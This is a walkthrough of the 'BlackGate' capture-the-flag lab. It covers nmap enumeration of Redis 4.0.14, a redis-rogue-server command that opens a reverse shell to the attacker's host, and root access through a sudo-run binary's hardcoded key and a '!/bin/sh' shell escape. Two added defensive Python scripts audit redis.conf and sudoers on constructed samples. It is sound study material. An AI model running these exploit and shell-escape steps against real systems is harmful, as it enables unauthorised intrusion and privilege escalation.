In this walkthrough, we will be going through the BlackGate room from Proving Grounds. This room is rated as Hard on the platform and it consists of exploiting a Redis server RCE to get an initial shell, followed by abusing the redis-status binary to get root. So, let's get started without any delay.
Machine Info:

| Field | Value |
|---|---|
| Title | BlackGate |
| IP address | 192.168.195.176 |
| Difficulty | Hard |
| OS | Linux |
| Description | BlackGate is a Hard Linux machine that requires redis server RCE exploitation to get an initial shell followed by the exploitation of redis-status binary to get root. |
Enumeration:
- I started off with a regular nmap aggressive scan and found only two ports open – 22 (SSH) and 6379 (Redis).

```
$ sudo nmap -A 192.168.195.176
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-18 11:22 IST
Nmap scan report for 192.168.195.176
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.3p1:
|       CVE-2020-15778  6.8     https://vulners.com/cve/CVE-2020-15778
|       C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3    6.8     https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3  *EXPLOIT*
|       10213DBE-F683-58BB-B6D3-353173626207    6.8     https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207  *EXPLOIT*
|       PRION:CVE-2016-20012    5.0     https://vulners.com/prion/PRION:CVE-2016-20012
|       PRION:CVE-2021-28041    4.6     https://vulners.com/prion/PRION:CVE-2021-28041
|       CVE-2021-28041  4.6     https://vulners.com/cve/CVE-2021-28041
|       PRION:CVE-2020-15778    4.4     https://vulners.com/prion/PRION:CVE-2020-15778
|       CVE-2021-41617  4.4     https://vulners.com/cve/CVE-2021-41617
|       PRION:CVE-2020-14145    4.3     https://vulners.com/prion/PRION:CVE-2020-14145
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-20012  4.3     https://vulners.com/cve/CVE-2016-20012
|       PRION:CVE-2021-41617    3.5     https://vulners.com/prion/PRION:CVE-2021-41617
|       PRION:CVE-2021-36368    2.6     https://vulners.com/prion/PRION:CVE-2021-36368
|_      CVE-2021-36368  2.6     https://vulners.com/cve/CVE-2021-36368
53/tcp filtered domain
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/18%OT=22%CT=1%CU=39821%PV=Y%DS=4%DC=T%G=Y%TM=65A8BCB
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M
OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%
OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6E
OS:21%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   205.15 ms 192.168.45.1
2   205.11 ms 192.168.45.254
3   205.77 ms 192.168.251.1
4   205.86 ms 192.168.195.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.33 seconds
```

A full TCP port sweep was run as well:

```
sudo nmap -sS -p- -T5 192.168.195.176
```
- Enumerated Redis with the nmap scripts, which revealed the Redis version running: 4.0.14.

```
sudo nmap --script redis-info,redis-brute -p 6379 192.168.195.176
```
Initial Access:
- Next, I checked online for exploits affecting this version and found that the Redis rogue server script can be used to get a reverse shell back through the Redis server.

```
./redis-rogue-server.py --rhost 192.168.195.176 --lhost 192.168.45.156
```
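From the defender's side, the exposure this step depends on is a Redis instance reachable from the network with no authentication and with replication and `MODULE LOAD` still enabled, which is what the publicly documented rogue-server technique needs. The following Python script is an added example, not part of the original write-up or of the rogue-server tool: it audits a `redis.conf` for exactly those settings and reports what would need to change. The two embedded configurations are constructed samples for illustration, not the target machine's real configuration.

```python
"""Audit a redis.conf for settings that leave Redis open to unauthenticated
remote abuse: listening on all interfaces, protected-mode off, no password,
and replication / module-loading commands left enabled.

Added example for illustration; the configs below are constructed samples.
"""

# Constructed sample resembling a weak, network-exposed deployment.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed sample of a hardened deployment.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass ChangeMe-LongRandomSecret
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
"""

# Commands the rogue-server technique relies on; disabling them via
# rename-command to "" removes them from the server entirely.
DANGEROUS_COMMANDS = ("MODULE", "SLAVEOF", "REPLICAOF", "CONFIG")


def parse_conf(text):
    """Return (directives, renamed): plain key->value directives, and a map of
    original command name -> new name from rename-command lines."""
    directives = {}
    renamed = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "rename-command":
            cmd, _, new_name = value.partition(" ")
            renamed[cmd.upper()] = new_name.strip().strip('"')
        else:
            directives[key] = value
    return directives, renamed


def audit(text):
    """Return a list of human-readable findings; an empty list means hardened."""
    directives, renamed = parse_conf(text)
    findings = []

    # With no bind directive at all, Redis listens on every interface.
    bind = directives.get("bind", "")
    if not bind or any(addr in ("0.0.0.0", "::", "*") for addr in bind.split()):
        findings.append("bind: listens on all interfaces")

    # protected-mode defaults to yes; only an explicit 'no' disables it.
    if directives.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled")

    if "requirepass" not in directives:
        findings.append("requirepass: no password set")

    for cmd in DANGEROUS_COMMANDS:
        if renamed.get(cmd) != "":
            findings.append(f"{cmd}: command not disabled via rename-command")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for finding in audit(conf) or ["no findings"]:
            print("  -", finding)
```

Run it against a real `redis.conf` by reading the file into `audit()`; anything it reports for an instance that is reachable from untrusted networks is worth fixing before relying on version upgrades alone, since the rogue-server technique does not depend on a single patched bug.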
- Captured the local flag.
Privilege Escalation:
- Moving on, I ran LinPEAS on the target to enumerate potential privilege escalation vectors and found that we can run the redis-status binary as root.
- Checking the binary for interesting strings with `strings` revealed a potential authorization key required by the redis-status binary.

```
strings /usr/local/bin/redis-status
```

```
ClimbingParrotKickingDonkey321
```

- Supplied the captured authorization key to the binary and, once the binary halted after processing, executed the command below to spawn a shell, which granted me a shell as root.

```
sudo /usr/local/bin/redis-status !/bin/sh
```
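The root step works because a sudo rule hands a low-privileged user a custom binary under `/usr/local/bin` that runs as root and carries a static key baked into the executable, so the "authorization" it performs protects nothing once anyone can read the file. An administrator can catch rules like this in a sudoers review before they are abused. The Python below is an added example, not from the write-up and not part of LinPEAS: it parses a constructed sudoers snippet (not the machine's real file) and flags rules that grant `NOPASSWD` access or point at binaries outside package-managed paths.

```python
"""Flag risky sudoers rules: NOPASSWD grants and commands that live outside
package-managed directories (custom binaries are the ones most likely to
embed secrets or offer shell escapes).

Added example for illustration; the sudoers text below is constructed.
"""
import re

# Constructed sample, not the target's real /etc/sudoers.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/local/bin/redis-status
backup  ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""

# who  host=(runas) TAG: cmd1, cmd2 ...
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Directories that distribution package managers populate; anything else is
# treated as a locally installed, unreviewed binary.
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")


def parse_sudoers(text):
    """Return a list of rule dicts for every user/group specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = {t.strip() for t in match.group("tags").split(":") if t.strip()}
        rules.append({
            "who": match.group("who"),
            "host": match.group("host"),
            "runas": match.group("runas") or "root",
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in match.group("cmds").split(",")],
        })
    return rules


def risky_rules(rules):
    """Return (who, command_path, reasons) for every rule worth a second look."""
    findings = []
    for rule in rules:
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                continue  # blanket admin rules are a policy question, not this check
            path = cmd.split()[0]
            reasons = []
            if rule["nopasswd"]:
                reasons.append("NOPASSWD")
            if not path.startswith(PACKAGED_PREFIXES):
                reasons.append("non-packaged binary")
            if reasons:
                findings.append((rule["who"], path, reasons))
    return findings


if __name__ == "__main__":
    for who, path, reasons in risky_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who}: {path} [{', '.join(reasons)}]")
```

Any command flagged as a non-packaged binary deserves a source or binary review for embedded credentials and for pager or editor escapes before it is allowed to run as root; any `NOPASSWD` grant should be narrowed to the exact arguments the task needs.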
- Finally captured the root flag to complete the challenge.
Conclusion:
So that was “BlackGate” for you. We started off with a regular nmap scan and found only two ports open – 22 (SSH) and 6379 (Redis). Enumerated the Redis service and found that the version running is 4.0.14. Looked online for any known exploit related to it and found that it is vulnerable to a Redis rogue server RCE vulnerability. Got access using that exploit and performed post-compromise enumeration with LinPEAS. Found a redis-status binary that we can run with sudo and abused it to get root on the system. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.